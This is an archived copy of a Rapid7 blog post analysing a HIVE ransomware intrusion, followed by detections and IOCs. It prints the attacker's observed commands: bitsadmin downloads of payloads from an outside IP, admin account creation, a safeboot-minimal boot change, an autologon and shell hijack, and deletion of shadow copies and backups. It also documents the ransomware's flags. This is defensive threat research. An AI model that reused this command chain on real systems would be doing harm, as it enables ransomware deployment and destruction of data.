{
	"id": "8988a20e-97f0-468a-98a9-d49dd4277bfc",
	"created_at": "2026-04-06T00:09:19.935392Z",
	"updated_at": "2026-04-10T13:12:43.448296Z",
	"deleted_at": null,
	"sha1_hash": "54af8be5ea55fbd4a6315af19bcf612522377164",
	"title": "HIVE Ransomware Attack Research \u0026 Analysis | Rapid7 Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 101830,
	"plain_text": "HIVE Ransomware Attack Research \u0026 Analysis | Rapid7 Blog\r\nBy Rapid7\r\nPublished: 2023-01-11 · Archived: 2026-04-05 18:21:04 UTC\r\nHow malicious actors evade detection and disable defenses for more destructive HIVE\r\nRansomware attacks.\r\nRapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious\r\nactivity. One objective of this research is to discover new techniques being used in the wild, so we can develop\r\nnew detection and response capabilities.\r\nRecently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware\r\nacross many systems within a victim’s environment. In addition to those techniques, the actor employed a number\r\nof previously unseen techniques designed to drop the defenses of the victim, inhibit monitoring, disable\r\nnetworking and allow time for the ransomware to finish encrypting files. These extra steps would make it\r\nextremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a\r\ncertain point in the attack.\r\nRapid7 has updated existing and added new detections to InsightIDR to defend against these techniques. 
In this\r\narticle, we’ll explore the techniques employed by the threat actor, why they’re so effective, and how we’ve\r\nupdated InsightIDR to protect against them.\r\nWhat approach did the malicious actor take to prepare the victim's environment?\r\nInitially using Cobalt Strike, the malicious actor retrieved system administration tools and malicious payloads by\r\nusing the Background Intelligent Transfer Service (BITSAdmin).\r\n\"C:\\Windows\\system32\\bitsadmin.exe\" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe\r\nbitsadmin /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:\\Windows\\int.exe\r\nThe malicious actor then began using the remote process execution tool PSExec to execute batch files (rdp.bat)\r\nthat would cause registry changes to enable Remote Desktop sessions (RDP) using reg.exe. This enabled the\r\nmalicious actor to laterally move throughout the victim’s environment using the graphical user interface.\r\nPSEXESVC.exe: C:\\Windows\\PSEXESVC.exe└──cmd.exe: C:\\Windows\\system32\\cmd.exe /c \"\"rdp.bat\" \"└── reg.exe:\r\nRapid7 observed the malicious actor add/change policies for the Active Directory domain to perform the\r\nfollowing:\r\n1. Copy down batch scripts\r\nhttps://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/\r\nPage 1 of 10\n\n2. Execute batch scripts (file1.bat), which:\r\n3. Creates administrator account on the local system\r\n4. Reconfigures boot configuration data (bcdedit.exe) so that the host will not load any additional drivers or\r\nservices (ie: network drivers or endpoint protection)\r\n5. Sets various registry values to ensure the created local administrator user will automatically logon by\r\ndefault\r\n6. Changes the Windows Shell from Explorer to their malicious script (file2.bat)\r\n7. Reboots the system with the shutdown command\r\n8. On reboot, the system logs in and executes the shell (file2.bat), which:\r\n9. 
Extracts HIVE ransomware payload(s) from an encrypted archive (int.7z) using 7-Zip's console executable\r\n(7zr.exe)\r\n10. Executes the ransomware payload (int.exe or int64.exe)\r\nBelow are some of the commands the malicious actor was observed executing (with necessary redactions):\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies {\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\file1.bat\" \"C:\\windows\"\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies\\{\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\file2.bat\" \"C:\\windows\"\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies\\{\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\7zr.exe\" \"C:\\windows\"\r\nxcopy.exe /C/Q/H/Y/Z\r\n\"\\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\Policies\\{\u003cREDACTED\u003e}\\Machine\\Scripts\\Startup\\int.7z\" \"C:\\windows\\\"\r\nC:\\WINDOWS\\SYSTEM32\\cmd.exe /c \"C:\\windows\\file1.bat\"\r\nnet user \u003cREDACTED\u003e \u003cREDACTED\u003e /add\r\nC:\\WINDOWS\\system32\\net1 user \u003cREDACTED\u003e \u003cREDACTED\u003e /add\r\nnet user \u003cREDACTED\u003e /active:yes\r\nC:\\WINDOWS\\system32\\net1 user \u003cREDACTED\u003e /active:yes\r\nnet localgroup Administrators \u003cREDACTED\u003e /add\r\nC:\\WINDOWS\\system32\\net1 localgroup Administrators \u003cREDACTED\u003e /add\r\nbcdedit /set {default} safeboot minimal\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v LegalNoticeText /t REG_SZ /d \"\" /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v LegalNoticeCaption /t REG_SZ /d \"\" /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LegalNoticeText /t REG_SZ /d \"\" /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LegalNoticeCaption /t REG_SZ /d \"\"\r\nreg add 
\"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultUserName /t REG_SZ /d \u003cREDACTED\u003e\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v DefaultPassword /t REG_SZ /d \u003cREDACTED\u003e\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoLogonCount /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v Shell /t REG_SZ /d \"C:\\windows\\file2.ba\r\nshutdown -r -f -t 10 -c \"Computer Will Now Restart In SAFE MODE...\"\r\nRapid7 also observed the malicious actor extracting the HIVE ransomware payload using 7-Zip's console application\r\n(7zr.exe) from an encrypted 7-Zip archive (int.7z) with a simple password (123):\r\n\"C:\\windows\\7zr.exe\" x c:\\windows\\int.7z -p123 -oc:\\windows\r\nThe malicious actor then manually executed the ransomware (int.exe) once with only the required\r\nusername:password combination passed to the -u flag. This presumably encrypted the local drive and also all\r\nnetwork shares the user had access to:\r\n\"C:\\Windows\\int.exe\" -u \u003cREDACTED\u003e:\u003cREDACTED\u003e\"\r\nThe malicious actor also manually executed the 64-bit version of the ransomware (int64.exe) once on a different\r\nhost with the -no-discovery flag. This is likely intended to override the default behavior so that it does not discover\r\nnetwork shares and encrypt their files. 
The -u flag was also passed, with the same username:password values as\r\nseen on the other host.\r\nC:\\Windows\\int64.exe  -u \u003cREDACTED\u003e:\u003cREDACTED\u003e -no-discovery\r\nWhy is the HIVE Ransomware approach so effective?\r\nDeployment of ransomware using Active Directory group policies allows the malicious actor to hit all systems in\r\nthe environment for as long as that group policy is active in the victim’s environment. In this case, any system that\r\nwas booting and connected to the environment would receive the encrypted archive containing the ransomware,\r\na decompression utility to extract the ransomware, the configuration changes and the\r\norder to reboot and execute. This can be especially effective if timed with deployments of patches that require a\r\nreboot, done at the beginning of the day or even remotely using PowerShell's Stop-Computer cmdlet.\r\nStoring the ransomware within an encrypted 7-Zip archive (int.7z), even with a password as simple as 123, makes\r\nthe task of identifying the ransomware on disk or transmitted across the network nearly impossible. This makes\r\nretrieval and staging of the malicious actor's payload very difficult for security software or devices to spot\r\n(Antivirus, Web Filtering, IDS/IPS and more). In this case, the malicious actor has taken care to only put the\r\nencrypted copy on the disk of a victim’s system and not execute it until they have fully dropped the defenses on\r\nthe endpoint.\r\nReconfiguring the default boot behavior to safeboot minimal and then executing a reboot unloads all but the bare\r\nminimum for the Windows operating system. With no additional services, software or drivers loaded, the system is\r\nat its most vulnerable. 
With no active defenses (Antivirus or Endpoint Protection), the system comes up and tries to\r\nstart its defined shell, which has been swapped to a batch script (file2.bat) by the malicious actor.\r\nIt should be noted that in this state, there is no method of remotely interacting with the system as no network\r\ndrivers are loaded. In order to respond and halt the ransomware, each host must be physically visited for\r\nshutdown. Manually priming the host in this way is more effective than the existing capabilities of the HIVE\r\nransomware, which stops specific defensive services (Windows Defender, etc.) and kills specific processes prior to\r\nencrypting the contents of the drive.\r\nAll systems in this state are left automatically logged in as an administrator, which gives anyone who has physical\r\naccess complete control. Lastly, the system will continue to boot into safeboot minimal mode by default (again, no\r\nnetworking) until each system is set back to its original state with a command such as the one below. Bringing the host\r\nback online in this state will still continue to execute the malware when logged into, which will also enable the\r\ndefault network spreading behavior.\r\nbcdedit /deletevalue {default} safeboot\r\nLastly, the malicious actor also manually executed the payload a few times on systems that had not been put into\r\nsafeboot minimal and rebooted. Systems on which they executed it with only the -u flag actively searched out network shares\r\nthey had access to and encrypted their contents. This ensures that only the intended hosts do network share\r\nencryption and all those that were rebooted into safeboot minimal do not flood the network simultaneously\r\nencrypting all files. 
It also means that the contents of network file shares that are not Windows based (various\r\nNAS devices, Linux hosts using Samba) will be encrypted even if the payload is not actually deployed on that\r\nspecific host. This approach would be extremely destructive to both corporate environments and home users with\r\nnetwork attached storage systems for backups. Rapid7 notes that ThreatLocker have reported on similar activity in\r\ntheir knowledge base article entitled Preventing BCDEdit From Being Weaponized.\r\nMalware analysis of HIVE sample\r\nRapid7 observed that the HIVE payload would not execute unless a flag of -u was passed. During analysis it was\r\ndiscovered that passing -u asdf:asdf would result in asdf:asdf being used as the Login and Password (colon-delimited)\r\nprovided to the victim to authenticate to the site behind the onion link on the TOR network:\r\nThis and other behaviors were previously reported on in Microsoft's article Hive Ransomware Gets Upgrades in\r\nRust and also by Sophos in their GitHub repository of IoCs mentioned in their article Lockbit, Hive, and\r\nBlackCat attack automotive supplier in triple ransomware attack. Some flags have been noted to\r\nexist, but their features are not documented. Rapid7 has analyzed and documented the behaviors of these flags, in\r\naddition to discovering two new flags (-timer, -low-key) in the HIVE ransomware samples.\r\nThe new flags -t, -timer, --timer cause the malware to wait the specified number of seconds before\r\ngoing on to perform its actions. The other new flags -low-key, --low-key will cause the ransomware to focus on\r\nonly its encryption of data and not perform pre-encryption tasks, including deleting shadow copies (malicious use\r\nof vssadmin.exe, wmic.exe), deleting backup catalogs (malicious use of wbadmin.exe), and disabling Windows\r\nRecovery Mode (malicious use of bcdedit.exe). 
These features give the malicious actor more control over\r\nhow/when the payload is executed and skirt common methods of command line and parent/child process related\r\ndetection for most ransomware families.\r\nFundamentally, the sample’s respective flags distill down into encryption operations of local, mount and\r\ndiscovery. The local module utilizes the LookupPrivilegeValueW and AdjustTokenPrivileges Windows API\r\ncalls on its own process, via GetCurrentProcess and OpenProcessToken, to obtain SeDebugPrivilege privileges.\r\nThis is presumably crucial for the OpenProcess -\u003e OpenProcessToken -\u003e ImpersonateLoggedOnUser API call\r\nsequence it attempts against the winlogon.exe and trustedinstaller.exe processes to subsequently stop security services and essential\r\nprocesses, if the --low-key flag is not passed during execution. ShellExecuteA is also used to launch various Windows\r\nbinaries (bcdedit.exe, notepad.exe, vssadmin.exe, wbadmin.exe, wmic.exe) for destruction of backups and ransom\r\nnote display purposes. The mount module will use NetUseEnum to identify the current list of locally-mounted\r\nnetwork shares and add them to the list to be encrypted. Lastly, the discovery module will use NetServerEnum to\r\nidentify available Windows hosts within the domain/workgroup. This list is then used with NetShareEnum to\r\nidentify file shares on each remote host and add them to the list of locations to have their files encrypted.\r\nBy default, all three modes (local, mount and discovery) are enabled, so all local file systems, mounted shares and\r\nshares able to be enumerated will have their contents encrypted. This effectively ransoms all systems in a victim’s environment\r\nwith a single execution of HIVE—when performed by a privileged user such as a Domain or Enterprise Admin\r\naccount. Command line flags may be used to change this behavior and invoke one or more of the modules. 
For\r\ninstance, --local-only will use only the local module while --network-only will use the mount and discovery\r\nmodules.\r\nFlag Description\r\n-u \u003cusername\u003e:\u003cpassword\u003e for login for hivecust*.onion domain to identify victim\r\n-da\r\n\u003cdomainname\u003e\\\u003cusername\u003e:\u003cpassword\u003e use different credentials when doing network\r\nspreading. Likely shorthand for \"Domain Admin\". Calls LogonUserW triggering a 4624(S):\r\nType 3 Network Logon event. Will then call ImpersonateLoggedOnUser using the token in the\r\nresponse from LogonUserW.\r\n-low-key\r\n--low-key\r\nEncrypt files and open ransom note, if local filesystem is to be encrypted, but do not spawn\r\nother binaries (vssadmin.exe, WMIC.exe, wbadmin.exe, bcdedit.exe) to perform other\r\ndestructive actions for impact. Will also skip enumeration and stopping of antivirus software.\r\n-no-local\r\n--no-local\r\nDo not encrypt local files\r\n-no-mounted\r\n--no-mounted\r\nDo not encrypt mounted filesystems\r\n-no-discovery\r\n--no-discovery\r\nDo not enumerate or encrypt file shares on the network\r\n-local-only\r\n--local-only\r\nOnly encrypt local file systems\r\n-network-only\r\n--network-only\r\nOnly encrypt file shares on the network.\r\n-explicit-only\r\n--explicit-only\r\nOnly encrypt files in the specified path\r\n-min-size\r\n--min-size\r\nOnly encrypt files greater than or equal to a specific number of bytes\r\n-t\r\n-timer\r\n--timer\r\nDo not encrypt files until after specified number of seconds\r\nBy default, the ransomware will execute the following child processes with the following arguments:\r\nUse of vssadmin.exe in order to delete shadow copies of files which deletes unencrypted backups of files they are\r\nattempting to ransom:\r\n\"C:\\Windows\\System32\\vssadmin.exe\" delete shadows /all /quiet\r\nUse of wmic.exe to create calls that also 
delete all shadow copies of files which deletes unencrypted backups of\r\nfiles they are attempting to ransom:\r\n\"C:\\Windows\\System32\\wbem\\WMIC.exe\" shadowcopy delete\r\nUse of wbadmin.exe to delete backup catalogs:\r\n\"C:\\Windows\\System32\\wbadmin.exe\" delete systemstatebackup\r\n\"C:\\Windows\\System32\\wbadmin.exe\" delete catalog-quiet\r\n\"C:\\Windows\\System32\\wbadmin.exe\" delete systemstatebackup -keepVersions:3\r\nUse of bcdedit.exe to disable automatic repair and ignore errors when booting:\r\n\"C:\\Windows\\System32\\bcdedit.exe\" /set {default} recoveryenabled No\r\n\"C:\\Windows\\System32\\bcdedit.exe\" /set {default} bootstatuspolicy ignoreallfailures\r\nLastly, also opening up notepad.exe to display the ransom note with instructions to the victim on how to pay:\r\n\"C:\\Windows\\System32\\notepad.exe\" C:\\HOW_TO_DECRYPT.txt\r\nRapid7 Protection\r\nRapid7's ransomware prevention solution, InsightIDR, has detections in place through Insight Agent to detect this\r\ntype of ransomware activity. 
However, since the malicious actor is rebooting into the safeboot minimal state,\r\nendpoint protection software and networking will not be running while the endpoint is executing ransomware.\r\nSo, identifying the actions of a malicious actor before ransomware is deployed is crucial to preventing the attack.\r\nIn other words, it is essential to identify malicious actors within the environment and eject them before the\r\nransomware payload is dropped.\r\nThe following detections are now available in InsightIDR to identify this attacker behavior.\r\nAttacker Technique - Auto Logon Count Set Once\r\nAttacker Technique - Potential Process Hollowing To DLLHost\r\nAttacker Technique - Shutdown With Message Used By Malicious Actors\r\nAttacker Technique - URL Passed To BitsAdmin\r\nLateral Movement - Enable RDP via reg.exe\r\nSuspicious Process - BCDEdit Enabling Safeboot\r\nSuspicious Process - Boot Configuration Data Editor Activity\r\nSuspicious Process - DLLHost With No Arguments Spawns Process\r\nSuspicious Process - Rundll32.exe With No Arguments Spawns Process\r\nSuspicious Process - ShadowCopy Delete Passed To WMIC\r\nSuspicious Process - Volume Shadow Service Delete Shadow Copies\r\nIOCs\r\nType Value\r\nRegistry Key HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\r\nRegistry Value Type: DWORD Name: fDenyTSConnections Value: 0\r\nFilename rdp.bat\r\nFilename file1.bat\r\nFilename file2.bat\r\nFilename int.7z\r\nFilename int64.exe\r\nMD5 89ea20880a6aae021940a8166ff85ee8\r\nSHA1 4af769fb3109c754bc879201c61242217a674a2e\r\nSHA256 067af912ceddb1ea181490f2b3b5a323efcac61c82207833cda70c21c84460cb\r\nFilename int.exe\r\nMD5 8fba0d57696ccf672ddcea4ba4d0e885\r\nSHA1 31097a7f91d182755fc63ebf023bff54cda5ae9c\r\nSHA256 184a0f96cef09408b192767b405b0266403c9ec429945c1a78703f04f18c7416\r\nIP Address 79.137.206[.]47\r\nFQDN 
paloaltocloud[.]online\r\nFQDN maxkey[.]online\r\nFQDN keycloud[.]live\r\nFQDN microcloud[.]online\r\nFQDN microcloud[.]live\r\nIP Address 194.135.24[.]241\r\nIP Address 179.43.142[.]230\r\nIP Address 77.73.133[.]80\r\nIP Address 77.73.134[.]27\r\nIP Address 77.73.134[.]10\r\nT1021 - Remote Services\r\nT1021.001 - Remote Desktop Protocol\r\nT1021.002 - SMB/Windows Admin Shares\r\nT1027 - Obfuscated Files Or Information\r\nT1027.009 - Embedded Payloads\r\nT1037 - Boot Or Logon Initialization Scripts\r\nT1037.003 - Network Logon Script\r\nT1059 - Command And Scripting Interpreter\r\nT1059.001 - PowerShell\r\nT1059.003 - Windows Command Shell\r\nT1070 - Indicator Removal\r\nT1080 - Taint Shared Content\r\nT1105 - Ingress Tool Transfer\r\nT1112 - Modify Registry\r\nT1135 - Network Share Discovery\r\nT1136 - Create Account\r\nT1136.001 - Local Account\r\nT1140 - Deobfuscate/Decode Files Or Information\r\nT1197 - BITS Jobs\r\nT1480 - Execution Guardrails\r\nT1484 - Domain Policy Modification\r\nT1484.001 - Group Policy Modification\r\nT1485 - Data Destruction\r\nT1486 - Data Encrypted For Impact\r\nT1489 - Service Stop\r\nT1490 - Inhibit System Recovery\r\nT1529 - System Shutdown/Reboot\r\nT1547 - Boot Or Logon Autostart Execution\r\nT1560 - Archive Collected Data\r\nT1560.001 - Archive Via Utility\r\nT1562 - Impair Defenses\r\nT1562.001 - Disable Or Modify Tools\r\nT1562.009 - Safe Mode Boot\r\nT1570 - Lateral Tool Transfer\r\nSoftware\r\nS0029 - PSExec\r\nS0075 - Reg\r\nS0190 - BITSAdmin\r\nS0154 - Cobalt Strike\r\nJakob Denlinger conducted malware analysis for this report.\r\nSource: https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/"
	],
	"report_names": [
		"increasing-the-sting-of-hive-ransomware"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434159,
	"ts_updated_at": 1775826763,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/54af8be5ea55fbd4a6315af19bcf612522377164.pdf",
		"text": "https://archive.orkl.eu/54af8be5ea55fbd4a6315af19bcf612522377164.txt",
		"img": "https://archive.orkl.eu/54af8be5ea55fbd4a6315af19bcf612522377164.jpg"
	}
}